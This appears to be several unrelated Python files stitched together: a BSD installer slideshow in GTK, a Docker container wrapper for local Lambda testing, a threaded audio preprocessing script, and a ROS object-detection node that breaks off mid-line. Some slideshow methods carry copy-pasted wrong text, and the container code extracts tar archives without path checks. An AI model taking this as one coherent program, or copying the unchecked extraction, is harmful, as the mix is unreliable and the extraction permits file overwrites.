Gtk.Label("Install more software ", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="software") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Search, install, upgrade, and uninstall software with OctoPkg software manager.\n\n" "OctoPkg is a powerful tool to manage GhostBSD/FreeBSD software. 
It has a simple interface which consists of just 2 panels, a list of all available software including results of searches and a tab widget showing 6 useful tabs for information, files, transaction, output, news, and a quick help guide.\n\n" "There are over 25000 software packages available to install.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def TheWeb(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD includes Mozilla Firefox, the web browser used by millions of people around the world.\n\n" "Browse the web safely and privately, share your files, software, and multimedia, send and receive e-mail, and communicate with friends and family.\n\n" "Web browsers such as Chromium and Epiphany are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def email(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD includes Mozilla Firefox, the web browser used by millions of people around the world.\n\n" "Browse the web safely and privately, share your files, software, and multimedia, send and receive e-mail, and communicate with friends and family.\n\n" "Web browsers such as Chromium and Epiphany are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Photos(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label(name="Header") label.set_markup('Organize, retouch, and share your photos') label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="photo") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("With Shotwell, it is really easy to organize and share your photos\n\n" "Use the Export option to copy your photos to a remote computer, iPod, a custom HTML gallery, or to export to services such as Flickr, Facebook, PicasaWeb, and more.\n\n" "For more advanced photos editing, Gimp is available for installation.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return 
vBox def MultiMedia(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and music", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="mutimedia") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD is ready to play videos and music from the web, CDs and DVDs.\n\n" "Exaile audio player lets you organize your music and listen to Internet radio, podcasts, and more, as well as synchronizes your audio collection to a portable audio player.\n\n" "\nGnome MPlayer allows you to easily watch videos from your computer, DVD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def communicate(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and music", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="communicate") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("GhostBSD is ready to play videos and music from the web, CDs and DVDs.\n\n" "Exaile audio player lets you organize your music and listen to Internet radio, podcasts, and more, as well as synchronizes your audio collection to a portable audio player.\n\n" "Gnome MPlayer allows you to easily watch videos from your computer, DVD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Help(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Help & Support", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="help") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Check out the forums for answers to all your GhostBSD questions.\n\n" "There's a good chance your question will have been answered already and, if not, you'll find volunteers eager to help.\n\n" "For more support options, go to our <a href='http://www.ghostbsd.org/support'>support page</a>.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def SlideRight(self): if self.stack.get_visible_child() == self.welcome: self.stack.set_visible_child(self.software) elif self.stack.get_visible_child() == self.software: self.stack.set_visible_child(self.web) elif self.stack.get_visible_child() == self.web: self.stack.set_visible_child(self.photos) elif self.stack.get_visible_child() == self.photos: self.stack.set_visible_child(self.multimedia) elif self.stack.get_visible_child() == self.multimedia: self.stack.set_visible_child(self.help) elif self.stack.get_visible_child() == self.help: self.stack.set_visible_child(self.welcome) def __init__(self): self.hBox = 
Gtk.HBox(False, 0) self.hBox.show() self.stack = Gtk.Stack() self.hBox.add(self.stack) # Adding slide self.grid in to stack self.welcome = self.Welcome() self.stack.add_named(self.welcome, "welcome") self.software = self.Software() self.stack.add_named(self.software, "software") self.web = self.TheWeb() self.stack.add_named(self.web, "web") self.photos = self.Photos() self.stack.add_named(self.photos, "photos") self.multimedia = self.MultiMedia() self.stack.add_named(self.multimedia, "multimedia") self.help = self.Help() self.stack.add_named(self.help, "help") self.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT) self.stack.show() thr = threading.Thread(target=self.slidesThreading) thr.setDaemon(True) thr.start() def get_slide(self): return self.hBox def slidesThreading(self): while 1: sleep(60) GLib.idle_add(self.SlideRight) class dbsdSlides: def Welcome(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Welcome to DesktopBSD!", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="welcome") hBox.show() vBox.pack_end(hBox, True, True, 0) vBox2 = Gtk.VBox(False, 0) vBox2.show() label2 = Gtk.Label(name="slideText") label2.set_markup("Thank you for choosing DesktopBSD. We hope you enjoy the BSD experience.\n\n" "We believe every computer Operating System should be elegant, lightweight, and secure. It should respect your privacy and give the user true freedom. DesktopBSD makes FreeBSD desktop computing much easier.\n\n" "We want DesktopBSD to work for you. So while your software is installing, this slideshow will introduce you to DesktopBSD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) # label2.set_max_width_chars(10) label2.set_alignment(0.0, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Software(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Install more software ", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="software") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Search, install, upgrade, and uninstall software with OctoPkg software manager.\n\n" "OctoPkg is a powerful tool to manage DesktopBSD/FreeBSD software. 
It has a simple interface which consists of just 2 panels, a list of all available software including results of searches and a tab widget showing 6 useful tabs information, files, transaction, output, news, and a quick help guide.\n\n" "There are over 25000 softwares available to install.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def TheWeb(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD includes the BSD licensed Chromium web browser from Google.\n\n" "Check out the Chrome Web Store for more apps to install in addition to the ones provided by DesktopBSD/FreeBSD.\n\n" "Web browsers such as Firefox and Epiphany are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def email(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Make the most of the web", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="web") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD includes Mozilla Thunderbird.\n\n" "Share your files, software, and multimedia, send and receive e-mail, and communicate with friends and family.\n\n" "Other email clients such as Evolution are easily installable.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Photos(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label(name="Header") label.set_markup('Organize, retouch, and share your photos') label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="photo") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("With Shotwell, it is really easy to organize and share your photos\n\n" "Use the Export option to copy your photos to a remote computer, iPod, a custom HTML gallery, or to export to services such as Flickr, Facebook, PicasaWeb, and more.\n\n" "For more advanced photos editing, Gimp is available for installation.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def MultiMedia(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and musics", name="Header") label.set_property("height-request", 40) 
vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="mutimedia") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD is ready to play videos and music from the web, CDs and DVDs.\n\n" "Exaile audio player lets you organize your music and listen to Internet radio, podcasts, and more, as well as synchronizes your audio collection to a portable audio player.\n\n" "\nVLC allows you to easily watch videos from your computer, DVD.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def communicate(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Play your movies and musics", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="communicate") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("DesktopBSD is setup to connect you to the world.\n\n" "Hexchat can be used to connect you to the DesktopBSD chat room on IRC.\n\n" "Pidgin can connect you to many popular instant messaging networks including Facebook.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def Help(self): vBox = Gtk.VBox(False, 0) vBox.show() label = Gtk.Label("Help & Support", name="Header") label.set_property("height-request", 40) vBox.pack_start(label, False, False, 0) hBox = Gtk.HBox(False, 0, name="help") hBox.show() vBox.pack_end(hBox, True, True, 0) label2 = Gtk.Label(name="slideText") label2.set_markup("Check out the forums for answers to all your DesktopBSD questions.\n\n" "There's a good chance your question will have been answered already and, if not, you'll find volunteers eager to help.\n\n" "For more support options, go to our <a href='http://www.desktopbsd.net'>website</a>.") label2.set_justify(Gtk.Justification.LEFT) label2.set_line_wrap(True) label2.set_alignment(0.1, 0.2) hBox2 = Gtk.HBox(False, 0, name="TransBox") hBox2.show() hBox.pack_start(hBox2, True, True, 0) hBox2.pack_start(label2, True, True, 30) label3 = Gtk.Label() hBox.pack_end(label3, True, True, 160) return vBox def SlideRight(self): if self.stack.get_visible_child() == self.welcome: self.stack.set_visible_child(self.software) elif self.stack.get_visible_child() == self.software: self.stack.set_visible_child(self.web) elif self.stack.get_visible_child() == self.web: self.stack.set_visible_child(self.photos) elif self.stack.get_visible_child() == self.photos: self.stack.set_visible_child(self.multimedia) elif self.stack.get_visible_child() == self.multimedia: self.stack.set_visible_child(self.help) elif self.stack.get_visible_child() == self.help: self.stack.set_visible_child(self.welcome) def __init__(self): self.hBox = Gtk.HBox(False, 0) self.hBox.show() self.stack = Gtk.Stack() self.hBox.add(self.stack) # Adding slide self.grid in to stack self.welcome = self.Welcome() self.stack.add_named(self.welcome, "welcome") self.software = self.Software() self.stack.add_named(self.software, "software") self.web = self.TheWeb() 
self.stack.add_named(self.web, "web") self.photos = self.Photos() self.stack.add_named(self.photos, "photos") self.multimedia = self.MultiMedia() self.stack.add_named(self.multimedia, "multimedia") self.help = self.Help() self.stack.add_named(self.help, "help") self.stack.set_transition_type(Gtk.StackTransitionType.SLIDE_LEFT) self.stack.show() thr = threading.Thread(target=self.slidesThreading) thr.setDaemon(True) thr.start() def get_slide(self): return self.hBox def slidesThreading(self): while 1: sleep(60) GLib.idle_add(self.SlideRight)
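# A standalone sketch of the thread/GUI pattern used by slidesThreading()
# above: a daemon worker thread never touches GTK widgets directly, it only
# schedules updates on the main loop via GLib.idle_add. The widget names and
# the tick interval are illustrative only; recent PyGObject needs no explicit
# threads_init() call.
import threading
from time import sleep

import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk, GLib


def ticker(label):
    for i in range(1, 6):
        sleep(1)
        GLib.idle_add(label.set_text, "tick %d" % i)  # runs on the GTK main loop


win = Gtk.Window(title="idle_add demo")
label = Gtk.Label(label="waiting...")
win.add(label)
win.connect("destroy", Gtk.main_quit)
win.show_all()

thr = threading.Thread(target=ticker, args=(label,))
thr.daemon = True
thr.start()
Gtk.main()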
container.py
""" Representation of a generic Docker container """ import logging import tarfile import tempfile import threading import docker import requests from docker.errors import NotFound as DockerNetworkNotFound from samcli.lib.utils.retry import retry from .exceptions import ContainerNotStartableException from .utils import to_posix_path, find_free_port, NoFreePortsError LOG = logging.getLogger(__name__) class ContainerResponseException(Exception): """ Exception raised when unable to communicate with RAPID APIs on a running container. """ class Container: """ Represents an instance of a Docker container with a specific configuration. The container is not actually created or executed until the appropriate methods are called. Each container instance is uniquely identified by an ID that the Docker Daemon creates when the container is started. NOTE: This class does not download container images. It should be pulled separately and made available before creating a container with this class """ # This frame type value is coming directly from Docker Attach Stream API spec _STDOUT_FRAME_TYPE = 1 _STDERR_FRAME_TYPE = 2 RAPID_PORT_CONTAINER = "8080" URL = "http://localhost:{port}/2015-03-31/functions/{function_name}/invocations" # Set connection timeout to 1 sec to support the large input. RAPID_CONNECTION_TIMEOUT = 1 def __init__( self, image, cmd, working_dir, host_dir, memory_limit_mb=None, exposed_ports=None, entrypoint=None, env_vars=None, docker_client=None, container_opts=None, additional_volumes=None, ): """ Initializes the class with given configuration. This does not automatically create or run the container. :param string image: Name of the Docker image to create container with :param string working_dir: Working directory for the container :param string host_dir: Directory in the host operating system that should be mounted to the ``working_dir`` on container :param list cmd: Command to pass to container :param int memory_limit_mb: Optional. Max limit of memory in MegaBytes this Lambda function can use. :param dict exposed_ports: Optional. Dict of ports to expose :param list entrypoint: Optional. Entry point process for the container. Defaults to the value in Dockerfile :param dict env_vars: Optional. Dict of environment variables to setup in the container """ self._image = image self._cmd = cmd self._working_dir = working_dir self._host_dir = host_dir self._exposed_ports = exposed_ports self._entrypoint = entrypoint self._env_vars = env_vars self._memory_limit_mb = memory_limit_mb self._network_id = None self._container_opts = container_opts self._additional_volumes = additional_volumes self._logs_thread = None # Use the given Docker client or create new one self.docker_client = docker_client or docker.from_env() # Runtime properties of the container. They won't have value until container is created or started self.id = None # aws-lambda-rie defaults to 8080 as the port, however that's a common port. A port is chosen by # selecting the first free port in a range that's not ephemeral. self._start_port_range = 5000 self._end_port_range = 9000 try: self.rapid_port_host = find_free_port(start=self._start_port_range, end=self._end_port_range) except NoFreePortsError as ex: raise ContainerNotStartableException(str(ex)) from ex def create(self): """ Calls Docker API to creates the Docker container instance. Creating the container does *not* run the container. 
Use ``start`` method to run the container :return string: ID of the created container :raise RuntimeError: If this method is called after a container already has been created """ if self.is_created(): raise RuntimeError("This container already exists. Cannot create again.") _volumes = {} if self._host_dir: LOG.info("Mounting %s as %s:ro,delegated inside runtime container", self._host_dir, self._working_dir) _volumes = { self._host_dir: { # Mount the host directory as "read only" directory inside container at working_dir # https://docs.docker.com/storage/bind-mounts # Mount the host directory as "read only" inside container "bind": self._working_dir, "mode": "ro,delegated", } } kwargs = { "command": self._cmd, "working_dir": self._working_dir, "volumes": _volumes, # We are not running an interactive shell here. "tty": False, # Set proxy configuration from global Docker config file "use_config_proxy": True, } if self._container_opts: kwargs.update(self._container_opts) if self._additional_volumes: kwargs["volumes"].update(self._additional_volumes) # Make sure all mounts are of posix path style. kwargs["volumes"] = {to_posix_path(host_dir): mount for host_dir, mount in kwargs["volumes"].items()} if self._env_vars: kwargs["environment"] = self._env_vars kwargs["ports"] = {self.RAPID_PORT_CONTAINER: ("127.0.0.1", self.rapid_port_host)} if self._exposed_ports: kwargs["ports"].update( {container_port: ("127.0.0.1", host_port) for container_port, host_port in self._exposed_ports.items()} ) if self._entrypoint: kwargs["entrypoint"] = self._entrypoint if self._memory_limit_mb: # Ex: 128m => 128MB kwargs["mem_limit"] = "{}m".format(self._memory_limit_mb) if self.network_id == "host": kwargs["network_mode"] = self.network_id real_container = self.docker_client.containers.create(self._image, **kwargs) self.id = real_container.id self._logs_thread = None if self.network_id and self.network_id != "host": try: network = self.docker_client.networks.get(self.network_id) network.connect(self.id) except DockerNetworkNotFound: # stop and delete the created container before raising the exception real_container.remove(force=True) raise return self.id def stop(self, time=3): """ Stop a container, with a given number of seconds between sending SIGTERM and SIGKILL. Parameters ---------- time Optional. Number of seconds between SIGTERM and SIGKILL. Effectively, the amount of time the container has to perform shutdown steps. Default: 3 """ if not self.is_created(): LOG.debug("Container was not created, cannot run stop.") return try: self.docker_client.containers.get(self.id).stop(timeout=time) except docker.errors.NotFound: # Container is already removed LOG.debug("Container with ID %s does not exist. Cannot stop!", self.id) except docker.errors.APIError as ex: msg = str(ex) removal_in_progress = ("removal of container" in msg) and ("is already in progress" in msg) # When removal is already started, Docker API will throw an exception # Skip such exceptions and log if not removal_in_progress: raise ex LOG.debug("Container removal is in progress, skipping exception: %s", msg) def delete(self): """ Removes a container that was created earlier. """ if not self.is_created(): LOG.debug("Container was not created. Skipping deletion") return try: self.docker_client.containers.get(self.id).remove(force=True) # Remove a container, even if it is running except docker.errors.NotFound: # Container is already not there LOG.debug("Container with ID %s does not exist. 
Skipping deletion", self.id) except docker.errors.APIError as ex: msg = str(ex) removal_in_progress = ("removal of container" in msg) and ("is already in progress" in msg) # When removal is already started, Docker API will throw an exception # Skip such exceptions and log if not removal_in_progress: raise ex LOG.debug("Container removal is in progress, skipping exception: %s", msg) self.id = None def start(self, input_data=None): """ Calls Docker API to start the container. The container must be created at the first place to run. It waits for the container to complete, fetches both stdout and stderr logs and returns through the given streams. Parameters ---------- input_data Optional. Input data sent to the container through container's stdin. """ if input_data: raise ValueError("Passing input through container's stdin is not supported") if not self.is_created(): raise RuntimeError("Container does not exist. Cannot start this container") # Get the underlying container instance from Docker API real_container = self.docker_client.containers.get(self.id) # Start the container real_container.start() @retry(exc=requests.exceptions.RequestException, exc_raise=ContainerResponseException) def wait_for_http_response(self, name, event, stdout): # TODO(sriram-mv): `aws-lambda-rie` is in a mode where the function_name is always "function" # NOTE(sriram-mv): There is a connection timeout set on the http call to `aws-lambda-rie`, however there is not # a read time out for the response received from the server. resp = requests.post( self.URL.format(port=self.rapid_port_host, function_name="function"), data=event.encode("utf-8"), timeout=(self.RAPID_CONNECTION_TIMEOUT, None), ) stdout.write(resp.content) def wait_for_result(self, name, event, stdout, stderr): # NOTE(sriram-mv): Let logging happen in its own thread, so that a http request can be sent. # NOTE(sriram-mv): All logging is re-directed to stderr, so that only the lambda function return # will be written to stdout. # the log thread will not be closed until the container itself got deleted, # so as long as the container is still there, no need to start a new log thread if not self._logs_thread or not self._logs_thread.is_alive(): self._logs_thread = threading.Thread(target=self.wait_for_logs, args=(stderr, stderr), daemon=True) self._logs_thread.start() self.wait_for_http_response(name, event, stdout) def wait_for_logs(self, stdout=None, stderr=None): # Return instantly if we don't have to fetch any logs if not stdout and not stderr: return if not self.is_created(): raise RuntimeError("Container does not exist. Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) # Fetch both stdout and stderr streams from Docker as a single iterator. logs_itr = real_container.attach(stream=True, logs=True, demux=True) self._write_container_output(logs_itr, stdout=stdout, stderr=stderr) def copy(self, from_container_path, to_host_path): if not self.is_created(): raise RuntimeError("Container does not exist. 
Cannot get logs for this container") real_container = self.docker_client.containers.get(self.id) LOG.debug("Copying from container: %s -> %s", from_container_path, to_host_path) with tempfile.NamedTemporaryFile() as fp: tar_stream, _ = real_container.get_archive(from_container_path) for data in tar_stream: fp.write(data) # Seek the handle back to start of file for tarfile to use fp.seek(0) with tarfile.open(fileobj=fp, mode="r") as tar: tar.extractall(path=to_host_path) @staticmethod def _write_container_output(output_itr, stdout=None, stderr=None): """ Based on the data returned from the Container output, via the iterator, write it to the appropriate streams Parameters ---------- output_itr: Iterator Iterator returned by the Docker Attach command stdout: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stdout data from Container into stderr: samcli.lib.utils.stream_writer.StreamWriter, optional Stream writer to write stderr data from the Container into """ # Iterator returns a tuple of (stdout, stderr) for stdout_data, stderr_data in output_itr: if stdout_data and stdout: stdout.write(stdout_data) if stderr_data and stderr: stderr.write(stderr_data) @property def network_id(self): """ Gets the ID of the network this container connects to :return string: ID of the network """ return self._network_id @network_id.setter def network_id(self, value): """ Set the ID of network that this container should connect to :param string value: Value of the network ID """ self._network_id = value @property def image(self): """ Returns the image used by this container :return string: Name of the container image """ return self._image def is_created(self): """ Checks if the real container exists? Returns ------- bool True if the container is created """ if self.id: try: self.docker_client.containers.get(self.id) return True except docker.errors.NotFound: return False return False def is_running(self): """ Checks if the real container status is running Returns ------- bool True if the container is running """ try: real_container = self.docker_client.containers.get(self.id) return real_container.status == "running" except docker.errors.NotFound: return False
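# A quick standalone check of the demuxed-stream handling implemented by
# _write_container_output() above: docker's attach(demux=True) yields
# (stdout_bytes, stderr_bytes) tuples in which either element may be None.
# It reuses the Container class defined above; _FakeWriter is an illustrative
# stand-in for samcli's StreamWriter.
import io


class _FakeWriter:
    def __init__(self):
        self.buffer = io.BytesIO()

    def write(self, data):
        self.buffer.write(data)


fake_itr = [(b"function result\n", None), (None, b"START RequestId ...\n"), (None, None)]
out, err = _FakeWriter(), _FakeWriter()
Container._write_container_output(fake_itr, stdout=out, stderr=err)
assert out.buffer.getvalue() == b"function result\n"
assert err.buffer.getvalue() == b"START RequestId ...\n"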
data_prepro_parallel.py
# -*- coding: utf-8 -*-
# !/usr/bin/env python

from __future__ import absolute_import
from __future__ import division
from __future__ import print_function

import argparse
import glob
import os
import sys
import threading

sys.path.append('.')

from audio import prepro_audio

nthreads = 20


class StoppableThread(threading.Thread):
    """Thread class with a stop() method. The thread itself has to check
    regularly for the stopped() condition."""

    def __init__(self, target, args):
        super(StoppableThread, self).__init__(target=target, args=args)
        self._stop_event = threading.Event()

    def stop(self):
        self._stop_event.set()

    def stopped(self):
        return self._stop_event.is_set()


class ThreadsafeIter:
    """Takes an iterator/generator and makes it thread-safe by
    serializing call to the `next` method of given iterator/generator.
    """

    def __init__(self, it):
        self.it = it
        self.lock = threading.Lock()

    def __iter__(self):
        return self

    def next(self):
        with self.lock:
            return self.it.next()


class Audio:
    def __init__(self, src_dir, tar_dir, format):
        self.tar_dir = tar_dir
        self.src_dir = src_dir
        self.lists = ThreadsafeIter(glob.iglob('{}/*.{}'.format(src_dir, format)))

    def next(self):
        src_path = next(self.lists)
        if src_path is None:
            raise StopIteration()

        relpath = os.path.relpath(src_path, self.src_dir)
        base, _ = os.path.split(relpath)
        tar_base = os.path.join(self.tar_dir, base)
        if not os.path.exists(tar_base):
            os.mkdir(tar_base)
        tar_path = os.path.join(self.tar_dir, relpath)

        # exclude extension
        src_path, _ = os.path.splitext(src_path)
        tar_path, _ = os.path.splitext(tar_path)

        return src_path, tar_path


def do_task(nthreads, audio, format, sr, db):
    print('Thread-{} start.\n'.format(nthreads))
    try:
        while True:
            src_path, tar_path = audio.next()
            src_path = '{}.{}'.format(src_path, format)
            tar_path = '{}.{}'.format(tar_path, 'wav')
            prepro_audio(src_path, tar_path, sr=sr, format=format, db=db)
    except StopIteration:
        print('Thread-{} done.\n'.format(nthreads))


if __name__ == '__main__':
    # get arguments
    parser = argparse.ArgumentParser()
    parser.add_argument('src_dir', type=str, help='source directory path.')
    parser.add_argument('tar_dir', type=str, help='target directory path.')
    parser.add_argument('-format', type=str, default='wav',
                        help='audio format: wav/mp3/flv/ogg/raw. default is wav.')
    parser.add_argument('-sr', type=int, help='sample rate.')
    parser.add_argument('-db', type=int, help='average decibel.')
    args = parser.parse_args()
    print(str(args))

    if not os.path.exists(args.tar_dir):
        os.mkdir(args.tar_dir)

    audio = Audio(args.src_dir, args.tar_dir, args.format)
    threads = [StoppableThread(target=do_task, args=(i, audio, args.format, args.sr, args.db))
               for i in range(nthreads)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()

    print('done.')
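The ThreadsafeIter wrapper above is the Python 2 form of a common pattern: several worker threads pulling work from one generator, with a lock serializing access. A Python 3 sketch of the same idea, with a hypothetical print-only worker standing in for the real audio preprocessing:

import glob
import threading


class ThreadSafeIter:
    """Serialize access to a shared iterator so many threads can pull from it."""

    def __init__(self, it):
        self.it = iter(it)
        self.lock = threading.Lock()

    def __iter__(self):
        return self

    def __next__(self):
        with self.lock:
            return next(self.it)    # raises StopIteration when exhausted


def worker(thread_id, paths):
    for path in paths:              # the for loop absorbs the StopIteration
        print('Thread-{} processing {}'.format(thread_id, path))


paths = ThreadSafeIter(glob.iglob('./**/*.wav', recursive=True))
threads = [threading.Thread(target=worker, args=(i, paths)) for i in range(4)]
for t in threads:
    t.start()
for t in threads:
    t.join()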
detection_node.py
#!/usr/bin/env python2.7 # -*- coding: utf-8 -*- import os os.environ["DARKNET_PATH"] = "/workspace/src/dependencies/darknet/" import rospy from sensor_msgs.msg import PointCloud2, Image, CameraInfo, PointCloud, PointField from geometry_msgs.msg import Point32, Point, PoseStamped, Pose, Twist import numpy as np import time from threading import Thread, Event import cv2 from cv_bridge import CvBridge, CvBridgeError import darknet import json import random from std_msgs.msg import String, Header, Int64 import sensor_msgs.point_cloud2 as pc2 import std_msgs.msg import tf import message_filters #import pcl from std_msgs.msg import Float32, Int64 from robobreizh.msg import CloudIndexed, CloudSources, GraspConfigList, DetectedObj, GraspConfig, BoundingBoxCoord from robobreizh.srv import detect_grasps, object_detection class ObjectsDetection(): def __init__(self): rospy.init_node('ObjectsDetectionNode', anonymous=False) self.darknet_config_dir = os.path.join(os.environ.get('DARKNET_PATH', './'), "darknet_config/") self.config_file = self.darknet_config_dir+"yolov4-tiny-obj.cfg" self.data_file = self.darknet_config_dir+"obj.data" self.weights = 